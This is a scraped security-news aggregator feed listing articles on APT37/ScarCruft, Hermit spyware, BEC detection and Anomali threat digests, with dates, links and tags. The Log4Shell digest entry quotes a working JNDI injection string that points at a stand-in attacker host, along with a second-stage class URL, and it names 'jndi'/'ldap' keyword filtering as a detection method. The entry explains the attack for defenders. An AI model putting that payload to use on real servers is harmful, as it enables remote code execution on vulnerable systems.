data of their targets. A distinct characteristic of the... ]]> 2023-02-21T01:00:00+00:00 https://asec.ahnlab.com/en/48063/ www.secnews.physaphae.fr/article.php?IdArticle=8312034 False Malware,Vulnerability,Threat,Cloud APT 37 3.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2023-02-15T20:29:00+00:00 https://thehackernews.com/2023/02/north-koreas-apt37-targeting-southern.html www.secnews.physaphae.fr/article.php?IdArticle=8310534 False Malware,Threat,Cloud APT 38,APT 37 2.0000000000000000 InformationSecurityBuzzNews - Site de News Securite 2023-02-15T10:06:57+00:00 https://informationsecuritybuzz.com/redeyes-hackers-malware-data-devices/ www.secnews.physaphae.fr/article.php?IdArticle=8310429 False Malware,Threat,Cloud APT 37 2.0000000000000000 Bleeping Computer - Magazine Américain 2023-02-14T17:37:57+00:00 https://www.bleepingcomputer.com/news/security/redeyes-hackers-use-new-malware-to-steal-data-from-windows-phones/ www.secnews.physaphae.fr/article.php?IdArticle=8310290 False Malware,Threat,Cloud APT 37 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-12-08T13:29:00+00:00 https://thehackernews.com/2022/12/google-warns-of-internet-explorer-zero.html www.secnews.physaphae.fr/article.php?IdArticle=8289009 False Vulnerability,Threat,Cloud APT 37 3.0000000000000000 Netskope - etskope est une société de logiciels américaine fournissant une plate-forme de sécurité informatique Another day, another legitimate cloud service exploited for a cyber espionage campaign… Researchers at ESET recently discovered Dolphin, a previously unreported backdoor used by the North-Korean threat actor APT37 (AKA ScarCruft and Reaper) against selected targets. The backdoor, deployed after the initial compromise using less sophisticated malware, was observed for the first time in early […] ]]> 2022-12-06T19:07:40+00:00 https://www.netskope.com/blog/cloud-threats-memo-cyber-espionage-exploiting-google-drive-for-c2-infrastructure www.secnews.physaphae.fr/article.php?IdArticle=8288358 False Threat,Cloud APT 37 3.0000000000000000 We Live Security - Editeur Logiciel Antivirus ESET Deployed against carefully selected targets, the new backdoor combs through the drives of compromised systems for files of interest before exfiltrating them to Google Drive ]]> 2022-12-02T14:00:43+00:00 https://www.welivesecurity.com/videos/scarcruft-updates-its-toolset-week-in-security-with-tony-anscombe/ www.secnews.physaphae.fr/article.php?IdArticle=8287209 False None APT 37 2.0000000000000000 Security Affairs - Blog Secu North Korea-linked ScarCruft group used a previously undocumented backdoor called Dolphin against targets in South Korea. ESET researchers discovered a previously undocumented backdoor called Dolphin that was employed by North Korea-linked ScarCruft group (aka APT37, Reaper, and Group123) in attacks aimed at targets in South Korea. ScarCruft has been active since at least 2012, it made the headlines in early February 2018 when researchers […] ]]> 2022-12-01T11:02:51+00:00 https://securityaffairs.co/wordpress/139148/hacking/north-korea-scarcruft-dolphin-backdoor.html www.secnews.physaphae.fr/article.php?IdArticle=8286204 False Cloud APT 37 2.0000000000000000 The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-12-01T00:00:00+00:00 https://thehackernews.com/2022/12/north-korea-hackers-using-new-dolphin.html www.secnews.physaphae.fr/article.php?IdArticle=8286037 False Threat,Cloud APT 37 2.0000000000000000 Data Security Breach - Site de news Francais 2022-11-30T14:15:11+00:00 https://www.datasecuritybreach.fr/dolphin-google-drive-hack/ www.secnews.physaphae.fr/article.php?IdArticle=8285909 False Cloud APT 37 3.0000000000000000 Global Security Mag - Site de news francais Malwares]]> 2022-11-30T13:59:28+00:00 https://www.globalsecuritymag.fr/ESET-Research-un-groupe-de-pirates-lie-a-la-Coree-du-Nord-vole-des-fichiers-de.html www.secnews.physaphae.fr/article.php?IdArticle=8285893 False Malware,Cloud APT 37 3.0000000000000000 We Live Security - Editeur Logiciel Antivirus ESET 2022-11-30T10:30:33+00:00 https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/ www.secnews.physaphae.fr/article.php?IdArticle=8285964 False Cloud APT 37 3.0000000000000000 Global Security Mag - Site de news francais Business]]> 2022-11-21T04:41:00+00:00 https://www.globalsecuritymag.fr/Hermitage-Solutions-signe-un-accord-de-distribution-avec-JumpCloud.html www.secnews.physaphae.fr/article.php?IdArticle=8124893 False Cloud APT 37 None Global Security Mag - Site de news francais Événements]]> 2022-11-18T23:30:00+00:00 https://www.globalsecuritymag.fr/24-nov-2022-12-00-13-00-Webinaire-ACCEDIAN-et-Hermitages-Solutions-Pourquoi.html www.secnews.physaphae.fr/article.php?IdArticle=8088601 False Cloud APT 37 None Global Security Mag - Site de news francais Business]]> 2022-11-17T17:40:11+00:00 https://www.globalsecuritymag.fr/Hermitage-Solutions-integre-la-solution-de-detection-et-de-reponse-reseau-NDR-d.html www.secnews.physaphae.fr/article.php?IdArticle=8070860 False Cloud APT 37 None CISCO Talos - Cisco Research blog By Abhishek Singh.BEC is a multi-stage attack. Adversaries first identify targets, then they establish rapport with the victim before exploiting them for whatever their end goal is. In the case of BEC, a threat actor can impersonate any employee in the organization to trick targets.  A policy that checks for authorized email addresses of the sender can prevent BEC attacks. However, scaling the approach for every employee in a large organization is a challenge.  Building an executive profile based on email analysis using a machine learning model and scanning emails against that profile will detect BEC. Data collection for building and training machine learning algorithms can take time, though, opening a window of opportunity for threat actors to exploit.  Detection of exploitation techniques such as lookalike domains and any differences in the email addresses in the "From" and "Reply-to" fields can also detect BEC messages. However, the final verdict cannot account for the threat actor's intent.  The intent-based approach detects BEC and then classifies it into the type of scam. It catches BEC messages, irrespective of whether a threat actor is impersonating a C-level executive or any employee in an organization. Classification based on the type of scam can help identify which segment of an organization was targeted and which employees were being impersonated by the threat actor. The additional information will further assist in better designing preventive features to stop BEC. Business email compromise (BEC) is one of the most financially damaging online crimes. As per the internet crime 221 report, the total loss in 2021 due to BEC is around 2.4 billion dollars. Since 2013, BEC has resulted in a 43 billion dollars loss. The report defines BEC as a scam targeting businesses (not individuals) working with foreign suppliers and companies regularly performing wire transfer payments. Fraudsters carry out these sophisticated scams to conduct the unauthorized transfer of funds. This introduces the challenge of how to detect and block these campaigns as they continue to compromise organizations successfully. There are a variety of approaches to identifying BEC email messages, such as using policy to allow emails from authorized email addresses, detecting exploitation techniques used by threat actors, building profiles by analysis of emails, and validating against the profile to detect BEC. These approaches have a variety of limitations or shortcomings. Cisco Talos is taking a different approach and using an intent-based model to identify and block BEC messages. Before we get too deep into the intent-based model, take a deeper look at the commonly used approaches to block BEC from the simplistic through machine learning (ML) approaches. Policy-based detection The first place to start is with policy-based detection as it is one of the most common and simplistic approaches to blocking BEC campaigns. Let's start by looking at an example of a BEC email. ]]> 2022-10-18T08:41:18+00:00 http://blog.talosintelligence.com/2022/10/the-benefits-of-taking-intent-based.html www.secnews.physaphae.fr/article.php?IdArticle=7540074 False Threat,Medical,Cloud APT 38,APT 19,APT 29,APT 10,APT 37,Uber,APT 15,Yahoo None Dark Reading - Informationweek Branch 2022-09-21T18:36:17+00:00 https://www.darkreading.com/application-security/sophisticated-hermit-mobile-spyware-government-surveillance www.secnews.physaphae.fr/article.php?IdArticle=7043892 False Cloud APT 37 None Fortinet - Fabricant Materiel Securite 2022-09-19T13:47:00+00:00 https://www.fortinet.com/blog/threat-research/konni-rat-phishing-email-deploying-malware www.secnews.physaphae.fr/article.php?IdArticle=7003888 False Cloud APT 37 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence LastPass Hackers Stole Source Code (published: August 26, 2022) In August 2022, an unidentified threat actor gained access to portions of the password management giant LastPass development environment. LastPass informed that it happened through a single compromised developer account and the attacker took portions of source code and some proprietary LastPass technical information. The company claims that this incident did not affect customer data or encrypted password vaults. Analyst Comment: This incident doesn’t seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment since “white-box hacking” (when source code of the attacking system is known) is easier for threat actors. Organizations providing public-facing software should take maximum measures to block threat actors from their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development. Tags: LastPass, Password manager, Data breach, Source code Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli (published: August 25, 2022) Starting in July 2022, a new campaign by Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers detected that this campaign was leveraging exploitation of Log4j 2 vulnerabilities (CVE-2021-45046 and CVE-2021-44228) in SysAid applications (IT management tools). For persistence Static Kitten was dropping webshells, creating local administrator accounts, stealing credentials, and adding their tools in the startup folders and autostart extensibility point (ASEP) registry keys. Overall the group was heavily using various open-source and built-in operating system tools: eHorus remote management software, Ligolo reverse tunneling tool, Mimikatz credential theft tool, PowerShell programs, RemCom remote service, Venom proxy tool, and Windows Management Instrumentation (WMI). Analyst Comment: Network defenders should monitor for alerts related to web shell threats, suspicious RDP sessions, ASEP registry anomaly, and suspicious account creation. Similarly, SysAid users can monitor for webshells and abnormal processes related to SysAisServer instance. Even though Static Kitten was observed leveraging the Log4Shell vulnerabilities in the past (targeting VMware apps), most of their attacks still start with spearphishing, often from a compromised email account. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Phishing - T1566 | ]]> 2022-08-30T15:01:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-first-real-life-video-spoofing-attack-magicweb-backdoors-via-non-standard-key-identifier-lockbit-ransomware-blames-victim-for-ddosing-back-and-more www.secnews.physaphae.fr/article.php?IdArticle=6626943 False Ransomware,Hack,Tool,Vulnerability,Threat,Guideline,Cloud APT 29,APT 37,LastPass None Kaspersky - Kaspersky Research blog 2022-08-25T01:00:31+00:00 https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/ www.secnews.physaphae.fr/article.php?IdArticle=6510805 False Threat,Cloud APT 37 None CISCO Talos - Cisco Research blog By Joe Marshall.The war in Ukraine has had far-reaching global implications and one of the most immediate effects felt will be on the global supply chain for food. This war-induced fragility has exposed the weaknesses of how we feed ourselves globally. Ransomware cartels and other adversaries are well aware of this and are actively exploiting that fragility. For the past six years, Cisco Talos has been actively involved in assisting public and private institutions in Ukraine to defend themselves against state-sponsored actors. Our involvement stretches the gamut from commercial to critical infrastructure, to election security. Our presence has afforded us unique opportunities and observations about cybersecurity in a macro and micro way. Ukraine has been a frequent victim of state-sponsored cyber attacks aimed at critical infrastructures like power and transportation. Talos is proud to stand with our partners in Ukraine and help defend their critical networks and help users there maintain access to necessary services. Now that Russia has invaded Ukraine, those threats have escalated to kinetic attacks that are wreaking havoc on a critical element of our world: agriculture and our global food supply chain. Even worse is the implications this war will have for future cyber attacks, as fragility is considered a lucrative element in deciding victimology by threat actors like ransomware cartels. To truly grasp the implications of the war in Ukraine, we have to examine how vital Ukrainian agriculture feeds the world, the current state of affairs, and what this means for the global cybersecurity posture to protect agricultural assets. Where there is weakness, there is opportunityRansomware cartels and their affiliates are actively targeting the agricultural industry. Moreover, these actors have done their homework and are targeting agricultural companies during the two times of the year where they cannot suffer disruptions: planting and harvesting. Per the published FBI PIN Alert: “Cyber actors may perceive cooperatives as lucrative targets with a willingness to pay due to the time-sensitive role they play in agricultural production.” This is far from unusual for these adversaries - they are shrewd and calculating, and understand their victims' weaknesses and industries. H]]> 2022-08-18T08:00:00+00:00 http://blog.talosintelligence.com/2022/08/ukraine-and-fragility-of-agriculture.html www.secnews.physaphae.fr/article.php?IdArticle=6392803 False Ransomware,Threat,Guideline,Cloud APT 10,APT 32,APT 37,APT 21,NotPetya,Uber,Guam,APT 28 None NoticeBored - Experienced IT Security professional glossy, nicely-constructed and detailed PowerPoint slide deck by Microsoft Security caught my beady this morning. The title 'CISO Workshop: Security Program and Strategy' with 'Your Name Here' suggests it might be a template for use in a workshop/course bringing CISOs up to speed on the governance, strategic and architectural aspects of information security, but in fact given the amount of technical detail, it appears to be aimed at informing IT/technology managers about IT or cybersecurity, specifically. Maybe it is intended for newly-appointed CISOs or more junior managers who aspire to be CISOs, helping them clamber up the pyramid (slide 87 of 142):]]> 2022-08-06T10:46:21+00:00 http://blog.noticebored.com/2022/08/a-glossy-nicely-constructed-and.html www.secnews.physaphae.fr/article.php?IdArticle=6150878 False Malware,Vulnerability,Threat,Patching,Guideline,Medical,Cloud APT 38,APT 19,APT 10,APT 37,Uber,APT 15,Guam,APT 28,APT 34 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence SharpTongue Deploys Clever Mail-Stealing Browser Extension “SHARPEXT” (published: July 28, 2022) Volexity researchers discovered SharpExt, a new malicious browser app used by the North-Korea sponsored Velvet Chollima (Kimsuky, SharpTongue, Thallium) group. SharpExt inspects and exfiltrates data from a victim's webmail (AOL or Gmail) account as they browse it. Velvet Chollima continues to add new features to the app, the latest known version (3.0) supports three browsers: Microsoft Edge, Google Chrome, and Whale, the latter almost exclusively used in South Korea. Following the initial compromise, Velvet Chollima deploy SharpExt and to avoid warning the victim they manually exfiltrate settings files to change the settings and generate a valid "super_mac" security check value. They also hide the newly opened DevTools window and any other warning windows such as a warning regarding extensions running in developer mode. Analyst Comment: Velvet Chollima is known for its tactic of deploying malicious browser extensions, but in the past it was concentrating on stealing credentials instead of emails. The group continues aggressive cyberespionage campaigns exfiltrating military and industrial technologies from Europe, South Korea, and the US. Network defenders should monitor for suspicious instances of PowerShell execution, as well as for traffic to and from known Velvet Chollima infrastructure (available in Anomali Match). MITRE ATT&CK: [MITRE ATT&CK] Browser Extensions - T1176 | [MITRE ATT&CK] Email Collection - T1114 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Hide Artifacts - T1564 Tags: SharpExt, Velvet Chollima, Kimsuky, SharpTongue, Thallium, APT, North Korea, source-country:KP, South Korea, target-country:KR, USA, target-country:US, target-region:Europe, AOL, Gmail, Edge, Chrome, Whale, PowerShell, VBS, Browser extension Untangling KNOTWEED: European Private-Sector Offensive Actor Using 0-Day Exploits (published: July 27, 2022) Microsoft researchers detail activity of DSIRF, Austrian private-sector offensive actor (PSOA). In 2021, this actor, tracked as Knotweed, used four Windows and Adobe 0-day exploits. In 2022, DSIRF was exploiting another Adobe Reader vulnerability, CVE-2022-22047, which was patched in July 2022. DSIRF attacks rely on their malware toolset called Subzero. The initial downloader shellcode is executed from either the exploit chains or malicious Excel documents. It downloads a JPG image file with extra encrypted data, extracts, decrypts and loads to the memory the Corelump memory-only infostealer. For persistence, Corelump creates trojanized copies of legitimate Windows DLLs that se]]> 2022-08-02T15:17:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-velvet-chollima-steals-emails-from-browsers-austrian-mercenary-leverages-zero-days-china-sponsored-group-uses-cosmicstrand-uefi-firmware-rootkit-and-more www.secnews.physaphae.fr/article.php?IdArticle=6091651 False Malware,Tool,Vulnerability,Threat,Patching,Guideline,Cloud APT 37,APT 28 None Security Affairs - Blog Secu North Korea-linked APT37 group targets high-value organizations in the Czech Republic, Poland, and other countries. Researchers from the Securonix Threat Research (STR) team have uncovered a new attack campaign, tracked as STIFF#BIZON, targeting high-value organizations in multiple countries, including Czech Republic, and Poland. The researchers attribute this campaign to the North Korea-linked APT37 group, aka […] ]]> 2022-07-24T13:53:53+00:00 https://securityaffairs.co/wordpress/133605/apt/apt37-stiffbizon-campaign.html www.secnews.physaphae.fr/article.php?IdArticle=5923023 False Threat,Cloud APT 37,APT 28 None Bleeping Computer - Magazine Américain 2022-07-23T12:08:04+00:00 https://www.bleepingcomputer.com/news/security/north-korean-hackers-attack-eu-targets-with-konni-rat-malware/ www.secnews.physaphae.fr/article.php?IdArticle=5907099 False Malware,Threat,Cloud APT 37 None Security Affairs - Blog Secu Apple plans to introduce a security feature, called Lockdown Mode, to protect its users against “highly targeted cyberattacks.” The recent wave of sophisticated attacks against Apple users (i.e. Pegasus, DevilsTongue, and Hermit) urged the tech giant to develop a new security feature, called Lockdown Mode, to protect its users against highly targeted cyberattacks. The new feature will be implemented in iOS 16, iPadOS […] ]]> 2022-07-09T16:53:07+00:00 https://securityaffairs.co/wordpress/133065/mobile-2/apple-lockdown-mode.html www.secnews.physaphae.fr/article.php?IdArticle=5631802 False Cloud APT 37 None Malwarebytes Labs - MalwarebytesLabs 2022-06-29T10:03:54+00:00 https://blog.malwarebytes.com/reports/2022/06/hermit-spyware-is-deployed-with-the-help-of-a-victims-isp/ www.secnews.physaphae.fr/article.php?IdArticle=5448875 False Cloud APT 37 None SecureMac - Security focused on MAC iOS Hermit spyware is a commercial-grade surveillance tool derived from a known Android surveillance tool. Learn more + how to stay safe. ]]> 2022-06-24T15:00:00+00:00 https://www.securemac.com/news/what-is-ios-hermit-spyware www.secnews.physaphae.fr/article.php?IdArticle=5360897 False Tool,Cloud APT 37 None ZD Net - Magazine Info 2022-06-24T12:37:15+00:00 https://www.zdnet.com/article/google-details-commercial-spyware-that-targets-both-android-and-ios-devices/#ftag=RSSbaffb68 www.secnews.physaphae.fr/article.php?IdArticle=5360803 False Cloud APT 37 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-06-24T03:40:50+00:00 https://thehackernews.com/2022/06/google-says-isps-helped-attackers.html www.secnews.physaphae.fr/article.php?IdArticle=5358737 False Malware,Cloud APT 37 None IT Security Guru - Blog Sécurité 2022-06-21T08:58:07+00:00 https://www.itsecurityguru.org/2022/06/21/lookout-discovers-android-spyware-deployed-in-kazakhstan/?utm_source=rss&utm_medium=rss&utm_campaign=lookout-discovers-android-spyware-deployed-in-kazakhstan www.secnews.physaphae.fr/article.php?IdArticle=5306195 False Cloud APT 37 None Security Affairs - Blog Secu Experts uncovered an enterprise-grade surveillance malware dubbed Hermit used to target individuals in Kazakhstan, Syria, and Italy since 2019. Lookout Threat Lab researchers uncovered enterprise-grade Android surveillance spyware, named Hermit, used by the government of Kazakhstan to track individuals within the country. The latest samples of this spyware were detected by the researchers in April 2022, four […] ]]> 2022-06-17T20:00:33+00:00 https://securityaffairs.co/wordpress/132363/malware/hermit-spyware-italian-surveillance-firm.html www.secnews.physaphae.fr/article.php?IdArticle=5226610 False Malware,Threat,Cloud APT 37 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-06-17T06:12:54+00:00 https://thehackernews.com/2022/06/researchers-uncover-hermit-android.html www.secnews.physaphae.fr/article.php?IdArticle=5220711 False Cloud APT 37 None Dark Reading - Informationweek Branch 2022-06-16T19:09:44+00:00 https://www.darkreading.com/mobile/android-spyware-hermit-discovered-in-targeted-attacks www.secnews.physaphae.fr/article.php?IdArticle=5197725 False None APT 37 None Global Security Mag - Site de news francais Malwares]]> 2022-06-16T12:45:37+00:00 http://www.globalsecuritymag.fr/Lookout-decouvre-un-logiciel,20220616,126738.html www.secnews.physaphae.fr/article.php?IdArticle=5189830 False Cloud APT 37 None SecurityWeek - Security News 2022-06-16T11:55:20+00:00 https://www.securityweek.com/sophisticated-android-spyware-hermit-used-governments www.secnews.physaphae.fr/article.php?IdArticle=5189385 False None APT 37 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence A Lookback Under the TA410 Umbrella: Its Cyberespionage TTPs and Activity (published: April 28, 2022) ESET researchers found three different teams under China-sponsored umbrella cyberespionage group TA410, which is loosely linked to Stone Panda (APT10, Chinese Ministry of State Security). ESET named these teams FlowingFrog, JollyFrog, and LookingFrog. FlowingFrog uses the Royal Road RTF weaponizer described by Anomali in 2019. Infection has two stages: the Tendyron implant followed by a very complex FlowCloud backdoor. JollyFrog uses generic malware such as PlugX and QuasarRAT. LookingFrog’s infection stages feature the X4 backdoor followed by the LookBack backdoor. Besides using different backdoors and exiting from IP addresses located in three different districts, the three teams use similar tools and similar tactics, techniques, and procedures (TTPs). Analyst Comment: Organizations should keep their web-facing applications such as Microsoft Exchange or SharePoint secured and updated. Educate your employees on handling suspected spearphishing attempts. Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Native API - T1106 | [MITRE ATT&CK] Shared Modules - T1129 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Inter-Process Communication - T1559 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Rootkit - T1014 | [MITRE ATT&CK] Process Injection - T1055 | ]]> 2022-05-03T16:31:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-time-to-ransom-under-four-hours-mustang-panda-spies-on-russia-ricochet-chollima-sends-goldbackdoor-to-journalists-and-more www.secnews.physaphae.fr/article.php?IdArticle=4538825 False Ransomware,Malware,Tool,Vulnerability,Threat,Guideline,Cloud APT 10,APT 10,APT 37 None CVE Liste - Common Vulnerability Exposure 2022-04-28T17:15:39+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29413 www.secnews.physaphae.fr/article.php?IdArticle=4518541 False Guideline,Cloud APT 37 None CVE Liste - Common Vulnerability Exposure 2022-04-28T17:15:39+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29411 www.secnews.physaphae.fr/article.php?IdArticle=4518539 False Vulnerability,Cloud APT 37 None CVE Liste - Common Vulnerability Exposure 2022-04-28T17:15:39+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29412 www.secnews.physaphae.fr/article.php?IdArticle=4518540 False Cloud APT 37 None CVE Liste - Common Vulnerability Exposure 2022-04-28T17:15:38+00:00 https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29410 www.secnews.physaphae.fr/article.php?IdArticle=4518538 False Vulnerability,Cloud APT 37 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2022-04-26T11:38:17+00:00 https://threatpost.com/hackers-target-journalists-goldbackdoor/179389/ www.secnews.physaphae.fr/article.php?IdArticle=4507846 False Malware,Cloud APT 37 None IT Security Guru - Blog Sécurité 2022-04-26T10:13:51+00:00 https://www.itsecurityguru.org/2022/04/26/north-korea-targets-journalists-with-novel-malware/?utm_source=rss&utm_medium=rss&utm_campaign=north-korea-targets-journalists-with-novel-malware www.secnews.physaphae.fr/article.php?IdArticle=4507806 False Malware,Cloud APT 37 None Security Affairs - Blog Secu 2022-04-26T08:25:03+00:00 https://securityaffairs.co/wordpress/130606/apt/apt37-targets-journalists-goldbackdoor.html www.secnews.physaphae.fr/article.php?IdArticle=4507417 False Cloud APT 37 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-04-26T02:53:07+00:00 https://thehackernews.com/2022/04/north-korean-hackers-target-journalists.html www.secnews.physaphae.fr/article.php?IdArticle=4507625 False Malware,Threat,Cloud APT 37 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1]]> 2021-12-15T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apache-log4j-zero-day-exploit-google-fighting-glupteba-botnet-vixen-panda-targets-latin-america-and-europe-and-more www.secnews.physaphae.fr/article.php?IdArticle=3800465 False Malware,Tool,Vulnerability,Threat,Cloud APT 29,APT 25,APT 37,APT 15,APT 15 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2021-12-07T22:33:02+00:00 https://thehackernews.com/2021/12/warning-yet-another-bitcoin-mining.html www.secnews.physaphae.fr/article.php?IdArticle=3760574 False Malware,Cloud APT 37 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New Malware Hides as Legit Nginx Process on E-Commerce Servers (published: December 2, 2021) Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system. Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity. MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Shared Modules - T1129 Tags: NginRAT, CronRAT, Nginx, North America, EU How Phishing Kits Are Enabling A New Legion Of Pro Phishers (published: December 2, 2021) Phishing kits, such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested. Analyst Comment: With financial transactions increasing around this time of year, it is likely financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel. Tags: Phishing, XBATLI Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors (pub]]> 2021-12-07T16:04:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-nginx-trojans-blackbyte-ransomware-android-malware-campaigns-and-more www.secnews.physaphae.fr/article.php?IdArticle=3757325 False Ransomware,Malware,Tool,Vulnerability,Threat,Cloud APT 37 4.0000000000000000 Security Affairs - Blog Secu 2021-12-07T15:28:27+00:00 https://securityaffairs.co/wordpress/125370/hacking/qnap-bitcoin-miner.html?utm_source=rss&utm_medium=rss&utm_campaign=qnap-bitcoin-miner www.secnews.physaphae.fr/article.php?IdArticle=3757279 False Threat,Cloud APT 37 None SecurityWeek - Security News 2021-11-30T12:24:19+00:00 https://www.securityweek.com/north-korean-hackers-use-new-chinotto-malware-target-windows-android-devices www.secnews.physaphae.fr/article.php?IdArticle=3727853 False Malware,Threat,Cloud APT 37 None Fortinet ThreatSignal - Harware Vendor 2021-11-30T11:24:48+00:00 https://www.fortiguard.com/threat-signal-report/4311 www.secnews.physaphae.fr/article.php?IdArticle=3791021 False Malware,Threat,Patching,Cloud APT 37 None Kaspersky Threatpost - Kaspersky est un éditeur antivirus russe 2021-11-29T19:08:06+00:00 https://threatpost.com/scarcruft-apt-desktop-mobile-attacks/176620/ www.secnews.physaphae.fr/article.php?IdArticle=3724250 False None APT 37 None Kaspersky - Kaspersky Research blog 2021-11-29T10:00:31+00:00 https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/ www.secnews.physaphae.fr/article.php?IdArticle=3722093 False Cloud APT 37 None Bleeping Computer - Magazine Américain 2021-11-29T08:43:29+00:00 https://www.bleepingcomputer.com/news/security/apt37-targets-journalists-with-chinotto-multi-platform-malware/ www.secnews.physaphae.fr/article.php?IdArticle=3722740 False Malware,Cloud APT 37 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2021-11-29T05:14:10+00:00 